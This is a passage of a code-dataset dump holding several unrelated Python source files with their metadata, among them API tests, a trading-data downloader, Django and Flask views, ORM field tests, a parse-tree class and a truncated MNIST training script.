'diseases',\n {'objects':\n {\n 'type': list,\n 'item': {\n 'type': dict,\n 'required': ['bytes', 'dataset', 'distributions', 'identifier', 'mimetype', 'name', 'updated'],\n 'optional': []}\n }\n }, 'organisms', 'protocols', 'publication', 'xrefs']\n}\nraw_structure_base = {\n 'type': dict,\n 'required': [\n {'hits': {\n 'type': dict,\n 'required': [\n {'hits':\n {'type': list,\n 'item': {\n 'type': dict,\n 'required': ['_index', '_type', '_id', '_score',\n {'_source': source_structure}\n ],\n 'optional': ['_ignored']}\n }\n }\n ],\n 'optional': [],\n }\n }\n ],\n 'optional': []\n}\n\n\nclass StructureDefinitionError(Exception):\n pass\n\n\ndef _test_sub_structure(data, structure, required=True):\n for st in structure:\n if isinstance(st, str):\n if required and st not in data:\n print(f'failed: {st}')\n return False\n\n continue\n\n # req should have exactly one key\n if not len(st.keys()) == 1:\n raise StructureDefinitionError\n\n key = next(iter(st))\n if required and key not in data:\n print(f'key failed: {key}')\n return False\n\n # if key == '_source':\n # a = list(data[key].keys())\n # a.sort()\n # print(a)\n if key in data and not _test_structure(data[key], st[key]):\n print(f'structure failed: {key} - {st[key][\"type\"]}, {type(data[key])} - {st[key]} - {len(data[key])}')\n return False\n\n return True\n\n\ndef _test_structure(data, structure):\n structure_type = structure['type']\n # print('=============================')\n # print(structure)\n if isinstance(data, structure_type):\n if structure_type is dict:\n if not _test_sub_structure(data, structure['required'], required=True):\n return False\n\n if not _test_sub_structure(data, structure['optional'], required=False):\n return False\n elif structure_type is list:\n for list_item in data:\n if not _test_structure(list_item, structure['item']):\n return False\n else:\n print('type if not dict or list', type(data))\n\n return True\n\n return False\n\n\ndef test_raw_response_structure(client):\n # 10.26275/zdxd-84xz\n # 10.26275/duz8-mq3n\n query = create_query_string(\"computational\")\n data = dataset_search(query)\n # print(data['hits']['hits'][0]['_source']['objects'])\n # print(data['hits']['hits'][0]['_source']['item'])\n assert _test_structure(data, raw_structure_base)\n assert 'hits' in data\n assert 'hits' in data['hits']\n assert isinstance(data['hits']['hits'], list)\n for hit in data['hits']['hits']:\n if 'version' in hit['_source']['item']:\n print(hit['_source']['item']['version']['keyword'])\n else:\n print('no version')\n\n for hit in data['hits']['hits']:\n print(hit['_source'].keys())\n objects = data['hits']['hits'][0]['_source']['objects']\n for o in objects:\n mimetype = o.get('mimetype', 'not-specified').get('name', 'no-name')\n # print('mimetype: ', mimetype)\n if mimetype == 'image/png':\n # print(o)\n print('.', end=\"\")\n\n print()\n # for k in data['hits']['hits'][0]:\n # print(k, data['hits']['hits'][0][k])\n\n\ndef test_getting_curies(client):\n # Test if we get a shorter list of uberons with species specified\n r = client.get('/get-organ-curies/')\n uberons_results = json.loads(r.data)\n total = len(uberons_results['uberon']['array'])\n assert total > 0\n r = client.get('/get-organ-curies/?species=human')\n uberons_results = json.loads(r.data)\n human = len(uberons_results['uberon']['array'])\n assert total > human\n # Test if the uberon - name match the one from the hardcoded list\n for item in uberons_results['uberon']['array']:\n assert UBERONS_DICT[item['id']] == item['name'].lower()\n\n\ndef test_scaffold_files(client):\n r = client.get('/filter-search/?size=30')\n results = json.loads(r.data)\n assert results['numberOfHits'] > 0\n for item in results['results']:\n if 'abi-scaffold-metadata-file' in item and 's3uri' in item:\n uri = item['s3uri']\n path = item['abi-scaffold-metadata-file'][0]['dataset']['path']\n key = f\"{uri}files/{path}\".replace('s3://pennsieve-prod-discover-publish-use1/', '')\n r = client.get(f\"/s3-resource/{key}\")\n assert r.status_code == 200\n\ndef test_finding_contextual_information(client):\n r = client.get('/dataset_info/using_multiple_discoverIds/?discoverIds=76')\n results = json.loads(r.data)\n assert results['numberOfHits'] > 0 # Test we could find the generic colon scaffold dataset\n for item in results['results']:\n assert len(item['abi-contextual-information']) > 0 # Check it has contextual information\n", "sub_path": "tests/test_scicrunch.py", "file_name": "test_scicrunch.py", "file_ext": "py", "file_size_in_byte": 17192, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.app.config", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 16, "usage_type": "name"}, {"api_name": "app.app.test_client", "line_number": 17, "usage_type": "call"}, {"api_name": "app.app", "line_number": 17, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 31, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 31, "usage_type": "name"}, {"api_name": "known_dois.has_doi_changed", "line_number": 32, "usage_type": "call"}, {"api_name": "known_dois.warn_doi_changes", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 47, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 47, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 53, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 64, "usage_type": "name"}, {"api_name": "pytest.skip", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 75, "usage_type": "call"}, {"api_name": "packaging.version.parse", "line_number": 77, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 77, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 91, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 96, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 101, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 106, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 111, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 116, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 126, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 134, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 156, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 160, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 171, "usage_type": "call"}, {"api_name": "packaging.version", "line_number": 176, "usage_type": "name"}, {"api_name": "packaging.version", "line_number": 178, "usage_type": "name"}, {"api_name": "packaging.version", "line_number": 180, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 192, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 194, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 205, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 222, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 234, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 246, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 250, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 252, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 259, "usage_type": "call"}, {"api_name": "app.scicrunch_requests.create_query_string", "line_number": 372, "usage_type": "call"}, {"api_name": "app.main.dataset_search", "line_number": 373, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 404, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 408, "usage_type": "call"}, {"api_name": "known_uberons.UBERONS_DICT", "line_number": 413, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 418, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 430, "usage_type": "call"}]} +{"seq_id": "146610869", "text": "from datetime import datetime\nfrom typing import NoReturn\n\nfrom injector import inject\n\nfrom application.command import DownloadMarketTradesCommand\nfrom domain.model.asset import Asset\nfrom domain.model.currency import Currency\nfrom domain.model.market.market_service import MarketService\nfrom domain.model.trade import MarketTrades, MarketTradesRepository\nfrom exception import SystemException\nfrom others import log\n\n\nclass MarketTradesApplicationService:\n \"\"\"取引所の歩み値をダウンロードするアプリケーションサービス\"\"\"\n\n @inject\n def __init__(self,\n market_service: MarketService,\n market_trades_repository: MarketTradesRepository):\n self.__market_service = market_service\n self.__market_trades_repository = market_trades_repository\n\n def download(self, command: DownloadMarketTradesCommand) -> NoReturn:\n asset = Asset(command.asset_name)\n currency = Currency(command.currency_name)\n pair = (asset, currency)\n\n log.info(\"{}/{}の歩み値をダウンロードします\".format(asset.name, currency.name))\n\n # ダウンロードする期間を指定\n _from = command.period.start\n _to = command.period.end\n while True:\n try:\n # 取引所から歩み値を取得します\n market_trades: MarketTrades = self.__market_service.fetch_market_trades(pair, _from)\n\n # 取得した歩み値を保存します\n self.__market_trades_repository.save(market_trades)\n\n # 最後の約定日時のタイムスタンプを取得する\n last_timestamp = market_trades.last_timestamp()\n log.info(\"最終約定日時: {}\".format(datetime.fromtimestamp(int(last_timestamp))))\n\n # 指定した日時まで取得できたら処理を止める\n if last_timestamp > _to.timestamp():\n break\n\n if last_timestamp != _from.timestamp():\n _from = datetime.fromtimestamp(int(last_timestamp))\n else:\n # 最初の約定日時と最後の約定日時が同じ場合、同じ_from値でリクエストしてしまうので+1する\n _from = datetime.fromtimestamp(int(last_timestamp + 1))\n except SystemException as e:\n e.logging()\n break\n\n log.info(\"{}/{}の歩み値をダウンロードが完了しました\".format(asset.name, currency.name))\n", "sub_path": "application/service/market_trades_application_service.py", "file_name": "market_trades_application_service.py", "file_ext": "py", "file_size_in_byte": 2556, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "domain.model.market.market_service.MarketService", "line_number": 20, "usage_type": "name"}, {"api_name": "domain.model.trade.MarketTradesRepository", "line_number": 21, "usage_type": "name"}, {"api_name": "injector.inject", "line_number": 18, "usage_type": "name"}, {"api_name": "application.command.DownloadMarketTradesCommand", "line_number": 25, "usage_type": "name"}, {"api_name": "domain.model.asset.Asset", "line_number": 26, "usage_type": "call"}, {"api_name": "domain.model.currency.Currency", "line_number": 27, "usage_type": "call"}, {"api_name": "others.log.info", "line_number": 30, "usage_type": "call"}, {"api_name": "others.log", "line_number": 30, "usage_type": "name"}, {"api_name": "domain.model.trade.MarketTrades", "line_number": 38, "usage_type": "name"}, {"api_name": "others.log.info", "line_number": 45, "usage_type": "call"}, {"api_name": "others.log", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 55, "usage_type": "name"}, {"api_name": "exception.SystemException", "line_number": 56, "usage_type": "name"}, {"api_name": "others.log.info", "line_number": 60, "usage_type": "call"}, {"api_name": "others.log", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.NoReturn", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "448343388", "text": "from django.shortcuts import render_to_response, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom recipes.models import *\nfrom recipes.forms import *\nfrom userprofiles.models import UserProfile\nfrom django.contrib.auth.models import User\n\ndef all(request, page=None):\n\tif page:\n\t\tl = page*15\n\t\th = l+15\n\telse:\n\t\tl = 0\n\t\th = 15\n\trecipes = Recipe.objects.all().order_by('-pk')[l:h]\n\treturn render_to_response('recipes/all.htm',\n\t\t\t\t\t\t\t {'title':'Recipes', 'recipes':recipes, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))\n\ndef view(request, pk=None):\n\trecipe = get_object_or_404(Recipe, pk=pk)\n\trecipe.formatted = recipe.formatted_body('ul')\n\treturn render_to_response('recipes/view.htm',\n\t\t\t\t\t\t\t {'title':recipe.name, 'recipe':recipe, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))\n\ndef view_by_user(request, username=None):\n\t#user = get_object_or_404(User, username=username)\n\tprofile = get_object_or_404(UserProfile, user__username=username)\n\trecipes = Recipe.objects.filter(creator__username=username)\n\treturn render_to_response('recipes/view_by_user.htm',\n\t\t\t\t\t\t\t {'profile':profile, 'recipes':recipes, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))\n\n@login_required\ndef create(request):\n\tif request.method == 'POST':\n\t\tform = CreateRecipeForm(request.POST, extra=request.POST.get('ingredient_fields'))\n\t\tif form.is_valid():\n\t\t\tingredients = ''\n\t\t\tfor field in xrange(10):\n\t\t\t\tingredients += form.cleaned_data['ingredient_field_%d' % field] + '\\n'\n\n\t\t\trecipe = Recipe.objects.create(creator=request.user, name=form.cleaned_data['name'],\n\t\t\t\t\t\t\t\t\t\t recipe=ingredients.rstrip(), notes=form.cleaned_data['notes'])\n\t\t\trecipe.save()\n\n\t\t\treturn HttpResponseRedirect('/recipes/view/%d/' % recipe.pk)\n\t\telse:\n\t\t\treturn render_to_response('recipes/create.htm',\n\t\t\t\t\t\t\t \t\t {'form':form, 'recipes_active':True},\n\t\t\t\t\t\t\t \t\t context_instance=RequestContext(request))\n\telse:\n\t\tform = CreateRecipeForm()\n\treturn render_to_response('recipes/create.htm',\n\t\t\t\t\t\t\t {'form':form, 'recipes_active':True},\n\t\t\t\t\t\t\t context_instance=RequestContext(request))", "sub_path": "recipes/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "recipes.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 18, "usage_type": "call"}, {"api_name": "recipes.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.template.RequestContext", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 25, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 31, "usage_type": "call"}, {"api_name": "userprofiles.models.UserProfile", "line_number": 31, "usage_type": "argument"}, {"api_name": "recipes.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 33, "usage_type": "call"}, {"api_name": "recipes.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.template.RequestContext", "line_number": 35, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 52, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 54, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 57, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "596217306", "text": "import time\nfrom flask import Blueprint, render_template, request, current_app\n\nfrom services.mysql_service import MySQLService\nfrom utils.chemical_utils import simple_compare, get_chemical_composition, get_key\n\nsearches = Blueprint('searches', __name__, template_folder='templates')\n\ndb = MySQLService()\n\n\n# Default search by name\n@searches.route('/search', methods=['POST'])\ndef default_search():\n if request.method == 'POST':\n name = request.form['mat_name']\n conn = db.get_connection()\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM rloveshhenko$mydbtest.main_info WHERE marka like %s or marka = %s\",\n (\"%\" + name + \"%\", \"%\" + name + \"%\"))\n materials = cur.fetchall()\n cur.close()\n return render_template('default_search.html', materials=materials, name=name)\n\n\n@searches.route('/chemical_search/', methods=['POST', 'GET'])\ndef chemical_search(id):\n conn = db.get_connection()\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM rloveshhenko$mydbtest.main_info where id = %s\", [id])\n base_material = cur.fetchone()\n\n result = cur.execute(\"SELECT * FROM rloveshhenko$mydbtest.main_info where id != %s\", [id])\n other_materials = cur.fetchall()\n\n cur.execute(\n \"SELECT atomic_Number, average FROM rloveshhenko$mydbtest.chemical_composition WHERE main_info_id = %s\", [id])\n chem_composition_first = cur.fetchall()\n\n cur.execute(\n \"SELECT main_info_id, atomic_Number, average FROM rloveshhenko$mydbtest.chemical_composition WHERE main_info_id != %s\",\n [id])\n chem_composition_others = cur.fetchall()\n\n current_app.logger.info('Other materials: ' + str(result))\n start_time = time.time()\n\n # indexes = chemical_Compare(chem_composition_first, chem_composition_others, other_materials, cur)\n for mat in other_materials:\n mat['index'] = simple_compare(chem_composition_first, get_chemical_composition(mat['id'], chem_composition_others))\n \"\"\"for material in other_materials:\n\t\tmaterial['index'] = chemical_Compare(chem_composition_first, material['id'], cur)\"\"\"\n\n finish_time = time.time()\n print(other_materials[-1])\n res = sorted(other_materials, key=get_key)\n print(res[-1])\n cur.close()\n current_app.logger.info('Time spent: ' + str(finish_time - start_time))\n return render_template('similar_materials.html', materials=res, base_material=base_material)\n", "sub_path": "routes/search_routes.py", "file_name": "search_routes.py", "file_ext": "py", "file_size_in_byte": 2332, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "services.mysql_service.MySQLService", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.current_app.logger.info", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.current_app.logger", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 45, "usage_type": "name"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "utils.chemical_utils.simple_compare", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.chemical_utils.get_chemical_composition", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.chemical_utils.get_key", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.current_app.logger.info", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.current_app.logger", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "590580440", "text": "import peewee\nimport pytest\n\nimport lasagna.db.orm as db_orm\n\n\ndef test_enum(gen_table):\n class TestTable(peewee.Model):\n enum = db_orm.EnumField(choices=['foo', 'bar'])\n\n test_table = gen_table(TestTable)\n test_table.create(enum='foo')\n res = test_table.select(test_table).execute().next()\n\n assert res.enum == 'foo'\n\n\ndef test_invalid_enum(gen_table):\n class TestTable(peewee.Model):\n enum = db_orm.EnumField(choices=['foo', 'bar'])\n\n test_table = gen_table(TestTable)\n\n with pytest.raises(ValueError) as exc:\n test_table.create(enum='baz')\n\n assert exc.value.args[0] == 'Invalid Enum Value \"baz\"'\n\n\ndef test_direction(gen_table):\n class TestTable(peewee.Model):\n direction = db_orm.DirectionField()\n\n test_table = gen_table(TestTable)\n test_table.create(direction=('title', 'text'))\n res = test_table.select(test_table).execute().next()\n\n assert res.direction == ('title', 'text')\n assert res.direction.title == 'title'\n assert res.direction.text == 'text'\n\n\ndef test_array_of_directions(gen_table):\n class TestTable(peewee.Model):\n directions = db_orm.ArrayField(db_orm.DirectionField)\n\n test_table = gen_table(TestTable)\n\n directions = [('title 1', 'text 1'), ('title 2', 'text 2')]\n test_table.create(directions=directions)\n res = test_table.select(test_table).execute().next()\n\n assert res.directions[0].title == directions[0][0]\n assert res.directions[0].text == directions[0][1]\n assert res.directions[1].title == directions[1][0]\n assert res.directions[1].text == directions[1][1]\n\n\ndef test_array_of_ints(gen_table):\n class TestTable(peewee.Model):\n integers = db_orm.ArrayField(peewee.IntegerField)\n\n test_table = gen_table(TestTable)\n\n test_table.create(integers=[1, 2, 3])\n res = test_table.select(test_table).execute().next()\n\n assert res.integers == [1, 2, 3]\n\n\ndef test_array_of_chars(gen_table):\n class TestTable(peewee.Model):\n chars = db_orm.ArrayField(peewee.CharField)\n\n test_table = gen_table(TestTable)\n\n test_table.create(chars=['foo', 'bar'])\n res = test_table.select(test_table).execute().next()\n\n assert res.chars == ['foo', 'bar']\n", "sub_path": "lasagna/tests/db/test_orm.py", "file_name": "test_orm.py", "file_ext": "py", "file_size_in_byte": 2214, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "peewee.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.EnumField", "line_number": 9, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 9, "usage_type": "name"}, {"api_name": "peewee.Model", "line_number": 19, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.EnumField", "line_number": 20, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 20, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 24, "usage_type": "call"}, {"api_name": "peewee.Model", "line_number": 31, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.DirectionField", "line_number": 32, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 32, "usage_type": "name"}, {"api_name": "peewee.Model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.ArrayField", "line_number": 45, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 45, "usage_type": "name"}, {"api_name": "lasagna.db.orm.DirectionField", "line_number": 45, "usage_type": "attribute"}, {"api_name": "peewee.Model", "line_number": 60, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.ArrayField", "line_number": 61, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 61, "usage_type": "name"}, {"api_name": "peewee.IntegerField", "line_number": 61, "usage_type": "attribute"}, {"api_name": "peewee.Model", "line_number": 72, "usage_type": "attribute"}, {"api_name": "lasagna.db.orm.ArrayField", "line_number": 73, "usage_type": "call"}, {"api_name": "lasagna.db.orm", "line_number": 73, "usage_type": "name"}, {"api_name": "peewee.CharField", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "331401670", "text": "from .parse_tree_node import ParseTreeNode\nfrom graphviz import Digraph\n\nimport sys\nclass ParseTree (object):\n def __init__(self):\n self.root = ParseTreeNode(0,\"ROOT\",\"ROOT\",\"ROOT\", None)\n self.root.token_type = \"ROOT\"\n self.all_nodes = [self.root]\n self.deleted_nodes = []\n\n def build_node(self, entry):\n if len(self.root.children) == 0:\n node = ParseTreeNode(int(entry[0]), entry[1],entry[2], entry[5], self.root)\n self.root.children.append(node)\n self.all_nodes.append(node)\n return True\n else:\n l = [self.root]\n while len(l) != 0:\n parent = l.pop(0)\n\n if parent.word_order == int(entry[3]):\n node = ParseTreeNode(int(entry[0]), entry[1],entry[2],entry[5], parent)\n parent.children.append(node)\n self.all_nodes.append(node)\n return True\n\n for child in parent.children:\n l += [child]\n return False\n\n\n def search_node_by_order(self, order):\n for node in self.all_nodes:\n if node.word_order == order:\n return node\n return None\n\n def search_node_by_id(self, id):\n for node in self.all_nodes:\n if node.node_id == id:\n return node\n return None\n\n def delete_node(self, node):\n parent = node.parent\n node.parent = None\n position = 0\n try:\n position = parent.children.index(node)\n except ValueError:\n position = -1\n\n if position == -1:\n return\n\n parent.children.remove(node)\n if node.left_rel != '' and len(node.children) > 0:\n node.children[0].left_rel = node.left_rel\n\n \n for i in range(len(node.children)):\n \n node.children[i].parent = parent\n parent.children.insert(position+i, node.children[i])\n\n self.all_nodes.remove(node)\n\n if node.token_type != \"QT\":\n self.deleted_nodes.append(node)\n\n def __repr__(self):\n result = ''\n node_list = [self.root]\n level_list = [0]\n\n while len(node_list) != 0:\n cur_node = node_list.pop(len(node_list) - 1)\n cur_level = level_list.pop(len(level_list) - 1)\n\n result += cur_level*\" \"\n result += '(' + str(cur_node.node_id) + ')'\n\n result += cur_node.label + '\\n'\n\n tam = len(cur_node.children)\n for i in range(tam):\n nxt = cur_node.children[tam -i - 1]\n node_list.append(nxt)\n level_list.append(cur_level + 1)\n return result\n\n def show(self):\n dot = Digraph(graph_attr={'size': '5'})\n\n def graphviz_node_id(node):\n if node.parent is not None:\n return f'{node.parent}.{node}'\n return f'{0}.{node}'\n\n\n def create_graphbiz(dot,root):\n dot.node(graphviz_node_id(root),label=root.label)\n for child in root.children:\n dot.edge(graphviz_node_id(root),graphviz_node_id(child))\n create_graphbiz(dot,child)\n\n create_graphbiz(dot,self.root)\n return dot\n", "sub_path": "nalir/data_structure/parse_tree.py", "file_name": "parse_tree.py", "file_ext": "py", "file_size_in_byte": 3285, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "parse_tree_node.ParseTreeNode", "line_number": 7, "usage_type": "call"}, {"api_name": "parse_tree_node.ParseTreeNode", "line_number": 14, "usage_type": "call"}, {"api_name": "parse_tree_node.ParseTreeNode", "line_number": 24, "usage_type": "call"}, {"api_name": "graphviz.Digraph", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "71200954", "text": "\"\"\"\n2021/3/9\ntrain mnist decoupling\n\"\"\"\nimport argparse\nimport os\nimport time\n\n# from torchvision.models import resnet18, resnet34, resnet50\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms, utils\n\nfrom models.models import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-name', type=str, help='project name', default='mnist_decoupling')\nparser.add_argument('-dataset_path', type=str, help='relative path of dataset', default='../dataset')\nparser.add_argument('-batch_size', type=int, help='batch size', default=64)\nparser.add_argument('-lr', type=float, help='learning rate', default=0.01)\nparser.add_argument('-epochs', type=int, help='training epochs', default=100)\nparser.add_argument('-log_dir', type=str, help='log dir', default='output')\nargs = parser.parse_args()\n\n\ndef create_dataloader():\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.1307,), std=(0.3081,))\n ])\n\n # load dataset\n train_set = datasets.MNIST(\n args.dataset_path, train=True, transform=transform, download=True)\n test_set = datasets.MNIST(\n args.dataset_path, train=False, transform=transform, download=False)\n\n # split train set into train-val set\n train_set, val_set = torch.utils.data.random_split(train_set, [\n 50000, 10000])\n\n # generate DataLoader\n train_loader = DataLoader(\n train_set, batch_size=args.batch_size, shuffle=True)\n\n val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False)\n\n test_loader = DataLoader(\n test_set, batch_size=args.batch_size, shuffle=False)\n\n return train_loader, val_loader, test_loader\n\n\ndef train(model1, model2, train_loader, optimizer1, optimizer2, epoch, device, train_loss_lst, train_acc_lst):\n model1.train() # Set the module in training mode\n model2.train()\n correct1 = 0\n correct2 = 0\n train_loss1 = 0\n train_loss2 = 0\n for batch_idx, (inputs, labels) in enumerate(train_loader):\n inputs, labels = inputs.to(device), labels.to(device)\n outputs1 = model1(inputs)\n outputs2 = model2(inputs)\n\n pred1 = outputs1.max(1, keepdim=True)[1]\n pred2 = outputs2.max(1, keepdim=True)[1]\n correct1 += pred1.eq(labels.view_as(pred1)).sum().item()\n correct2 += pred2.eq(labels.view_as(pred2)).sum().item()\n\n index = []\n for i in range(inputs.size(0)):\n if pred1[i] != pred2[i]:\n index.append(i)\n\n criterion = nn.CrossEntropyLoss(reduction='none')\n loss1 = criterion(outputs1, labels)\n loss2 = criterion(outputs2, labels)\n\n loss1 = torch.index_select(loss1, dim=-1, index=torch.tensor(index, dtype=torch.int64).to(device)).mean()\n loss2 = torch.index_select(loss2, dim=-1, index=torch.tensor(index, dtype=torch.int64).to(device)).mean()\n\n optimizer1.zero_grad()\n optimizer2.zero_grad()\n loss1.backward()\n loss2.backward()\n optimizer1.step()\n optimizer2.step()\n train_loss1 += loss1.item()\n train_loss2 += loss2.item()\n\n # show batch0 dataset\n if batch_idx == 0 and epoch == 0:\n fig = plt.figure()\n inputs = inputs.detach().cpu() # convert to cpu\n grid = utils.make_grid(inputs)\n plt.imshow(grid.numpy().transpose((1, 2, 0)))\n plt.savefig(os.path.join(output_path, 'batch0.png'))\n plt.close(fig)\n\n # print train loss and accuracy\n if (batch_idx + 1) % 100 == 0:\n print('Train Epoch: {} [{}/{} ({:.1f}%)] Loss1: {:.6f}, Loss2: {:.6f}'\n .format(epoch, batch_idx * len(inputs), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss1.item(), loss2.item()))\n\n # record loss and accuracy\n train_loss1 /= len(train_loader) # must divide iter num\n train_loss_lst.append(train_loss1)\n train_acc_lst.append(correct1 / len(train_loader.dataset))\n return train_loss_lst, train_acc_lst\n\n\ndef validate(model1, model2, val_loader, device, val_loss_lst, val_acc_lst):\n model1.eval() # Set the module in evaluation mode\n model2.eval()\n val_loss1 = 0\n val_loss2 = 0\n correct1 = 0\n correct2 = 0\n\n # no need to calculate gradients\n with torch.no_grad():\n for data, target in val_loader:\n data, target = data.to(device), target.to(device)\n output1 = model1(data)\n output2 = model2(data)\n\n criterion = nn.CrossEntropyLoss()\n val_loss1 += criterion(output1, target).item()\n val_loss2 += criterion(output2, 